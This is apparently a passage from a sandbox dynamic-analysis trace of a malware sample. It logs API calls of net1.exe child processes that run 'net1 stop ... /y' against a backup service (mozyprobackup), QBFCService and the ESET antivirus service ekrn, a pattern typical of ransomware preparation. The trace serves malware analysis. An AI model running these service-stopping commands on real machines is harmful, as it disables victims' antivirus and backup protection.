lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0113.750] WriteFile (in: hFile=0x0, lpBuffer=0x746178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x35fd88, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fd88, lpOverlapped=0x0) returned 0 [0113.750] LocalFree (hMem=0x746178) returned 0x0 [0113.750] GetFileType (hFile=0x0) returned 0x0 [0113.750] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x746178 [0113.750] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x746178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nt", lpUsedDefaultChar=0x0) returned 2 [0113.750] WriteFile (in: hFile=0x0, lpBuffer=0x746178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fd88, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fd88, lpOverlapped=0x0) returned 0 [0113.750] LocalFree (hMem=0x746178) returned 0x0 [0113.751] NetApiBufferFree (Buffer=0x741ae8) returned 0x0 [0113.751] NetApiBufferFree (Buffer=0x741b00) returned 0x0 [0113.751] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mozyprobackup /y" [0113.751] exit (_Code=2) Process: id = "176" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x22fb1000" os_pid = "0x11f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "69" os_parent_pid = "0xdf0" cmd_line = "C:\\Windows\\system32\\net1 stop QBFCService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 563 os_tid = 0x11fc [0113.370] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16feec | out: lpSystemTimeAsFileTime=0x16feec*(dwLowDateTime=0x1754f090, dwHighDateTime=0x1d6f0d1)) [0113.370] GetCurrentProcessId () returned 0x11f8 [0113.370] GetCurrentThreadId () returned 0x11fc [0113.370] GetTickCount () returned 0x114faa4 [0113.370] QueryPerformanceCounter (in: lpPerformanceCount=0x16fee4 | out: lpPerformanceCount=0x16fee4*=23247209778) returned 1 [0113.372] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0113.372] __set_app_type (_Type=0x1) [0113.372] __p__fmode () returned 0x770331f4 [0113.372] __p__commode () returned 0x770331fc [0113.372] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0113.372] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0113.372] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.372] GetConsoleOutputCP () returned 0x1b5 [0113.373] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0113.373] SetThreadUILanguage (LangId=0x0) returned 0x409 [0113.376] sprintf_s (in: _DstBuf=0x16fea4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0113.376] setlocale (category=0, locale=".437") returned="English_United States.437" [0113.614] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0113.614] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0113.614] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop QBFCService /y" [0113.614] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16fc70, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0113.615] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x6a) returned 0x743ad8 [0113.615] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0113.615] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16fe74 | out: Buffer=0x16fe74*=0x741ae0) returned 0x0 [0113.615] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16fe74 | out: Buffer=0x16fe74*=0x741af8) returned 0x0 [0113.615] _fileno (_File=0x77032900) returned -2 [0113.615] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0113.615] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0113.615] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0113.615] _wcsicmp (_String1="config", _String2="stop") returned -16 [0113.615] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0113.615] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0113.615] _wcsicmp (_String1="file", _String2="stop") returned -13 [0113.615] _wcsicmp (_String1="files", _String2="stop") returned -13 [0113.615] _wcsicmp (_String1="group", _String2="stop") returned -12 [0113.615] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0113.615] _wcsicmp (_String1="help", _String2="stop") returned -11 [0113.616] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0113.616] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0113.616] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0113.616] _wcsicmp (_String1="session", _String2="stop") returned -15 [0113.616] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0113.616] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0113.616] _wcsicmp (_String1="share", _String2="stop") returned -12 [0113.616] _wcsicmp (_String1="start", _String2="stop") returned -14 [0113.616] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0113.616] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0113.616] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0113.616] _wcsicmp (_String1="accounts", _String2="QBFCService") returned -16 [0113.616] _wcsicmp (_String1="computer", _String2="QBFCService") returned -14 [0113.616] _wcsicmp (_String1="config", _String2="QBFCService") returned -14 [0113.616] _wcsicmp (_String1="continue", _String2="QBFCService") returned -14 [0113.616] _wcsicmp (_String1="cont", _String2="QBFCService") returned -14 [0113.616] _wcsicmp (_String1="file", _String2="QBFCService") returned -11 [0113.616] _wcsicmp (_String1="files", _String2="QBFCService") returned -11 [0113.616] _wcsicmp (_String1="group", _String2="QBFCService") returned -10 [0113.616] _wcsicmp (_String1="groups", _String2="QBFCService") returned -10 [0113.616] _wcsicmp (_String1="help", _String2="QBFCService") returned -9 [0113.616] _wcsicmp (_String1="helpmsg", _String2="QBFCService") returned -9 [0113.616] _wcsicmp (_String1="localgroup", _String2="QBFCService") returned -5 [0113.616] _wcsicmp (_String1="pause", _String2="QBFCService") returned -1 [0113.616] _wcsicmp (_String1="session", _String2="QBFCService") returned 2 [0113.616] _wcsicmp (_String1="sessions", _String2="QBFCService") returned 2 [0113.616] _wcsicmp (_String1="sess", _String2="QBFCService") returned 2 [0113.616] _wcsicmp (_String1="share", _String2="QBFCService") returned 2 [0113.617] _wcsicmp (_String1="start", _String2="QBFCService") returned 2 [0113.617] _wcsicmp (_String1="stats", _String2="QBFCService") returned 2 [0113.617] _wcsicmp (_String1="statistics", _String2="QBFCService") returned 2 [0113.617] _wcsicmp (_String1="stop", _String2="QBFCService") returned 2 [0113.617] _wcsicmp (_String1="time", _String2="QBFCService") returned 3 [0113.617] _wcsicmp (_String1="user", _String2="QBFCService") returned 4 [0113.617] _wcsicmp (_String1="users", _String2="QBFCService") returned 4 [0113.617] _wcsicmp (_String1="msg", _String2="QBFCService") returned -4 [0113.617] _wcsicmp (_String1="messenger", _String2="QBFCService") returned -4 [0113.617] _wcsicmp (_String1="receiver", _String2="QBFCService") returned 1 [0113.617] _wcsicmp (_String1="rcv", _String2="QBFCService") returned 1 [0113.617] _wcsicmp (_String1="netpopup", _String2="QBFCService") returned -3 [0113.617] _wcsicmp (_String1="redirector", _String2="QBFCService") returned 1 [0113.617] _wcsicmp (_String1="redir", _String2="QBFCService") returned 1 [0113.617] _wcsicmp (_String1="rdr", _String2="QBFCService") returned 1 [0113.617] _wcsicmp (_String1="workstation", _String2="QBFCService") returned 6 [0113.617] _wcsicmp (_String1="work", _String2="QBFCService") returned 6 [0113.617] _wcsicmp (_String1="wksta", _String2="QBFCService") returned 6 [0113.617] _wcsicmp (_String1="prdr", _String2="QBFCService") returned -1 [0113.617] _wcsicmp (_String1="devrdr", _String2="QBFCService") returned -13 [0113.617] _wcsicmp (_String1="lanmanworkstation", _String2="QBFCService") returned -5 [0113.617] _wcsicmp (_String1="server", _String2="QBFCService") returned 2 [0113.617] _wcsicmp (_String1="svr", _String2="QBFCService") returned 2 [0113.617] _wcsicmp (_String1="srv", _String2="QBFCService") returned 2 [0113.617] _wcsicmp (_String1="lanmanserver", _String2="QBFCService") returned -5 [0113.617] _wcsicmp (_String1="alerter", _String2="QBFCService") returned -16 [0113.617] _wcsicmp (_String1="netlogon", _String2="QBFCService") returned -3 [0113.618] _wcsupr (in: _String="QBFCService" | out: _String="QBFCSERVICE") returned="QBFCSERVICE" [0113.618] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7454a8 [0113.729] GetServiceKeyNameW (in: hSCManager=0x7454a8, lpDisplayName="QBFCSERVICE", lpServiceName=0x39aaf0, lpcchBuffer=0x16fe10 | out: lpServiceName="", lpcchBuffer=0x16fe10) returned 0 [0113.732] _wcsicmp (_String1="msg", _String2="QBFCSERVICE") returned -4 [0113.732] _wcsicmp (_String1="messenger", _String2="QBFCSERVICE") returned -4 [0113.732] _wcsicmp (_String1="receiver", _String2="QBFCSERVICE") returned 1 [0113.733] _wcsicmp (_String1="rcv", _String2="QBFCSERVICE") returned 1 [0113.733] _wcsicmp (_String1="redirector", _String2="QBFCSERVICE") returned 1 [0113.733] _wcsicmp (_String1="redir", _String2="QBFCSERVICE") returned 1 [0113.733] _wcsicmp (_String1="rdr", _String2="QBFCSERVICE") returned 1 [0113.733] _wcsicmp (_String1="workstation", _String2="QBFCSERVICE") returned 6 [0113.733] _wcsicmp (_String1="work", _String2="QBFCSERVICE") returned 6 [0113.733] _wcsicmp (_String1="wksta", _String2="QBFCSERVICE") returned 6 [0113.733] _wcsicmp (_String1="prdr", _String2="QBFCSERVICE") returned -1 [0113.733] _wcsicmp (_String1="devrdr", _String2="QBFCSERVICE") returned -13 [0113.733] _wcsicmp (_String1="lanmanworkstation", _String2="QBFCSERVICE") returned -5 [0113.733] _wcsicmp (_String1="server", _String2="QBFCSERVICE") returned 2 [0113.734] _wcsicmp (_String1="svr", _String2="QBFCSERVICE") returned 2 [0113.734] _wcsicmp (_String1="srv", _String2="QBFCSERVICE") returned 2 [0113.734] _wcsicmp (_String1="lanmanserver", _String2="QBFCSERVICE") returned -5 [0113.734] _wcsicmp (_String1="alerter", _String2="QBFCSERVICE") returned -16 [0113.734] _wcsicmp (_String1="netlogon", _String2="QBFCSERVICE") returned -3 [0113.734] NetServiceControl (in: servername=0x0, service="QBFCSERVICE", opcode=0x0, arg=0x0, bufptr=0x16fe0c | out: bufptr=0x16fe0c) returned 0x889 [0113.752] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0113.752] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0113.753] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0113.754] GetFileType (hFile=0x0) returned 0x0 [0113.754] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x743ec8 [0113.754] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x743ec8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0113.754] WriteFile (in: hFile=0x0, lpBuffer=0x743ec8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x16fd4c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16fd4c, lpOverlapped=0x0) returned 0 [0113.754] LocalFree (hMem=0x743ec8) returned 0x0 [0113.754] GetFileType (hFile=0x0) returned 0x0 [0113.754] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x746170 [0113.754] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x746170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nt", lpUsedDefaultChar=0x0) returned 2 [0113.754] WriteFile (in: hFile=0x0, lpBuffer=0x746170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16fd4c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16fd4c, lpOverlapped=0x0) returned 0 [0113.754] LocalFree (hMem=0x746170) returned 0x0 [0113.754] _ultow (in: _Dest=0x889, _Radix=1506684 | out: _Dest=0x889) returned="2185" [0113.754] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0113.754] GetFileType (hFile=0x0) returned 0x0 [0113.754] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x746170 [0113.754] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x746170, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0113.754] WriteFile (in: hFile=0x0, lpBuffer=0x746170, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x16fd58, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16fd58, lpOverlapped=0x0) returned 0 [0113.754] LocalFree (hMem=0x746170) returned 0x0 [0113.754] GetFileType (hFile=0x0) returned 0x0 [0113.754] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x746170 [0113.754] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x746170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nt", lpUsedDefaultChar=0x0) returned 2 [0113.754] WriteFile (in: hFile=0x0, lpBuffer=0x746170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16fd58, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16fd58, lpOverlapped=0x0) returned 0 [0113.755] LocalFree (hMem=0x746170) returned 0x0 [0113.755] NetApiBufferFree (Buffer=0x741ae0) returned 0x0 [0113.755] NetApiBufferFree (Buffer=0x741af8) returned 0x0 [0113.755] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop QBFCService /y" [0113.755] exit (_Code=2) Process: id = "177" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x22215000" os_pid = "0x1200" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "65" os_parent_pid = "0xd3c" cmd_line = "C:\\Windows\\system32\\net1 stop ekrn /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 564 os_tid = 0x1204 [0113.398] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfc14 | out: lpSystemTimeAsFileTime=0x2cfc14*(dwLowDateTime=0x1759b350, dwHighDateTime=0x1d6f0d1)) [0113.398] GetCurrentProcessId () returned 0x1200 [0113.398] GetCurrentThreadId () returned 0x1204 [0113.398] GetTickCount () returned 0x114fac4 [0113.398] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfc0c | out: lpPerformanceCount=0x2cfc0c*=23249911355) returned 1 [0113.399] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0113.399] __set_app_type (_Type=0x1) [0113.399] __p__fmode () returned 0x770331f4 [0113.399] __p__commode () returned 0x770331fc [0113.399] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0113.399] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0113.399] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.399] GetConsoleOutputCP () returned 0x1b5 [0113.399] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0113.399] SetThreadUILanguage (LangId=0x0) returned 0x409 [0113.403] sprintf_s (in: _DstBuf=0x2cfbcc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0113.403] setlocale (category=0, locale=".437") returned="English_United States.437" [0113.621] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0113.621] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0113.621] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ekrn /y" [0113.622] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cf998, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0113.622] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x5c) returned 0x453ac8 [0113.622] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0113.622] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2cfb9c | out: Buffer=0x2cfb9c*=0x451ad0) returned 0x0 [0113.622] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2cfb9c | out: Buffer=0x2cfb9c*=0x451ae8) returned 0x0 [0113.622] _fileno (_File=0x77032900) returned -2 [0113.622] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0113.622] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0113.622] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0113.622] _wcsicmp (_String1="config", _String2="stop") returned -16 [0113.622] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0113.622] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0113.622] _wcsicmp (_String1="file", _String2="stop") returned -13 [0113.622] _wcsicmp (_String1="files", _String2="stop") returned -13 [0113.622] _wcsicmp (_String1="group", _String2="stop") returned -12 [0113.622] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0113.623] _wcsicmp (_String1="help", _String2="stop") returned -11 [0113.623] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0113.623] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0113.623] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0113.623] _wcsicmp (_String1="session", _String2="stop") returned -15 [0113.623] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0113.623] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0113.623] _wcsicmp (_String1="share", _String2="stop") returned -12 [0113.623] _wcsicmp (_String1="start", _String2="stop") returned -14 [0113.623] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0113.623] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0113.623] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0113.623] _wcsicmp (_String1="accounts", _String2="ekrn") returned -4 [0113.623] _wcsicmp (_String1="computer", _String2="ekrn") returned -2 [0113.623] _wcsicmp (_String1="config", _String2="ekrn") returned -2 [0113.623] _wcsicmp (_String1="continue", _String2="ekrn") returned -2 [0113.623] _wcsicmp (_String1="cont", _String2="ekrn") returned -2 [0113.623] _wcsicmp (_String1="file", _String2="ekrn") returned 1 [0113.623] _wcsicmp (_String1="files", _String2="ekrn") returned 1 [0113.623] _wcsicmp (_String1="group", _String2="ekrn") returned 2 [0113.623] _wcsicmp (_String1="groups", _String2="ekrn") returned 2 [0113.623] _wcsicmp (_String1="help", _String2="ekrn") returned 3 [0113.623] _wcsicmp (_String1="helpmsg", _String2="ekrn") returned 3 [0113.623] _wcsicmp (_String1="localgroup", _String2="ekrn") returned 7 [0113.623] _wcsicmp (_String1="pause", _String2="ekrn") returned 11 [0113.623] _wcsicmp (_String1="session", _String2="ekrn") returned 14 [0113.623] _wcsicmp (_String1="sessions", _String2="ekrn") returned 14 [0113.623] _wcsicmp (_String1="sess", _String2="ekrn") returned 14 [0113.623] _wcsicmp (_String1="share", _String2="ekrn") returned 14 [0113.624] _wcsicmp (_String1="start", _String2="ekrn") returned 14 [0113.624] _wcsicmp (_String1="stats", _String2="ekrn") returned 14 [0113.624] _wcsicmp (_String1="statistics", _String2="ekrn") returned 14 [0113.624] _wcsicmp (_String1="stop", _String2="ekrn") returned 14 [0113.624] _wcsicmp (_String1="time", _String2="ekrn") returned 15 [0113.624] _wcsicmp (_String1="user", _String2="ekrn") returned 16 [0113.624] _wcsicmp (_String1="users", _String2="ekrn") returned 16 [0113.624] _wcsicmp (_String1="msg", _String2="ekrn") returned 8 [0113.624] _wcsicmp (_String1="messenger", _String2="ekrn") returned 8 [0113.624] _wcsicmp (_String1="receiver", _String2="ekrn") returned 13 [0113.624] _wcsicmp (_String1="rcv", _String2="ekrn") returned 13 [0113.624] _wcsicmp (_String1="netpopup", _String2="ekrn") returned 9 [0113.624] _wcsicmp (_String1="redirector", _String2="ekrn") returned 13 [0113.624] _wcsicmp (_String1="redir", _String2="ekrn") returned 13 [0113.624] _wcsicmp (_String1="rdr", _String2="ekrn") returned 13 [0113.624] _wcsicmp (_String1="workstation", _String2="ekrn") returned 18 [0113.624] _wcsicmp (_String1="work", _String2="ekrn") returned 18 [0113.624] _wcsicmp (_String1="wksta", _String2="ekrn") returned 18 [0113.624] _wcsicmp (_String1="prdr", _String2="ekrn") returned 11 [0113.624] _wcsicmp (_String1="devrdr", _String2="ekrn") returned -1 [0113.624] _wcsicmp (_String1="lanmanworkstation", _String2="ekrn") returned 7 [0113.624] _wcsicmp (_String1="server", _String2="ekrn") returned 14 [0113.624] _wcsicmp (_String1="svr", _String2="ekrn") returned 14 [0113.624] _wcsicmp (_String1="srv", _String2="ekrn") returned 14 [0113.624] _wcsicmp (_String1="lanmanserver", _String2="ekrn") returned 7 [0113.624] _wcsicmp (_String1="alerter", _String2="ekrn") returned -4 [0113.624] _wcsicmp (_String1="netlogon", _String2="ekrn") returned 9 [0113.625] _wcsupr (in: _String="ekrn" | out: _String="EKRN") returned="EKRN" [0113.625] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x455488 [0113.730] GetServiceKeyNameW (in: hSCManager=0x455488, lpDisplayName="EKRN", lpServiceName=0x39aaf0, lpcchBuffer=0x2cfb38 | out: lpServiceName="", lpcchBuffer=0x2cfb38) returned 0 [0113.735] _wcsicmp (_String1="msg", _String2="EKRN") returned 8 [0113.735] _wcsicmp (_String1="messenger", _String2="EKRN") returned 8 [0113.735] _wcsicmp (_String1="receiver", _String2="EKRN") returned 13 [0113.735] _wcsicmp (_String1="rcv", _String2="EKRN") returned 13 [0113.735] _wcsicmp (_String1="redirector", _String2="EKRN") returned 13 [0113.735] _wcsicmp (_String1="redir", _String2="EKRN") returned 13 [0113.735] _wcsicmp (_String1="rdr", _String2="EKRN") returned 13 [0113.735] _wcsicmp (_String1="workstation", _String2="EKRN") returned 18 [0113.735] _wcsicmp (_String1="work", _String2="EKRN") returned 18 [0113.736] _wcsicmp (_String1="wksta", _String2="EKRN") returned 18 [0113.736] _wcsicmp (_String1="prdr", _String2="EKRN") returned 11 [0113.736] _wcsicmp (_String1="devrdr", _String2="EKRN") returned -1 [0113.736] _wcsicmp (_String1="lanmanworkstation", _String2="EKRN") returned 7 [0113.736] _wcsicmp (_String1="server", _String2="EKRN") returned 14 [0113.736] _wcsicmp (_String1="svr", _String2="EKRN") returned 14 [0113.736] _wcsicmp (_String1="srv", _String2="EKRN") returned 14 [0113.736] _wcsicmp (_String1="lanmanserver", _String2="EKRN") returned 7 [0113.736] _wcsicmp (_String1="alerter", _String2="EKRN") returned -4 [0113.736] _wcsicmp (_String1="netlogon", _String2="EKRN") returned 9 [0113.736] NetServiceControl (in: servername=0x0, service="EKRN", opcode=0x0, arg=0x0, bufptr=0x2cfb34 | out: bufptr=0x2cfb34) returned 0x889 [0113.756] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0113.756] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0113.757] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0113.758] GetFileType (hFile=0x0) returned 0x0 [0113.758] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x453ea8 [0113.758] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x453ea8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0113.758] WriteFile (in: hFile=0x0, lpBuffer=0x453ea8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2cfa74, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfa74, lpOverlapped=0x0) returned 0 [0113.758] LocalFree (hMem=0x453ea8) returned 0x0 [0113.758] GetFileType (hFile=0x0) returned 0x0 [0113.758] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x456150 [0113.758] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x456150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nE", lpUsedDefaultChar=0x0) returned 2 [0113.758] WriteFile (in: hFile=0x0, lpBuffer=0x456150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cfa74, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfa74, lpOverlapped=0x0) returned 0 [0113.758] LocalFree (hMem=0x456150) returned 0x0 [0113.758] _ultow (in: _Dest=0x889, _Radix=2947748 | out: _Dest=0x889) returned="2185" [0113.758] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0113.758] GetFileType (hFile=0x0) returned 0x0 [0113.758] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x456150 [0113.758] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x456150, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0113.758] WriteFile (in: hFile=0x0, lpBuffer=0x456150, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2cfa80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfa80, lpOverlapped=0x0) returned 0 [0113.759] LocalFree (hMem=0x456150) returned 0x0 [0113.759] GetFileType (hFile=0x0) returned 0x0 [0113.759] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x456150 [0113.759] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x456150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nE", 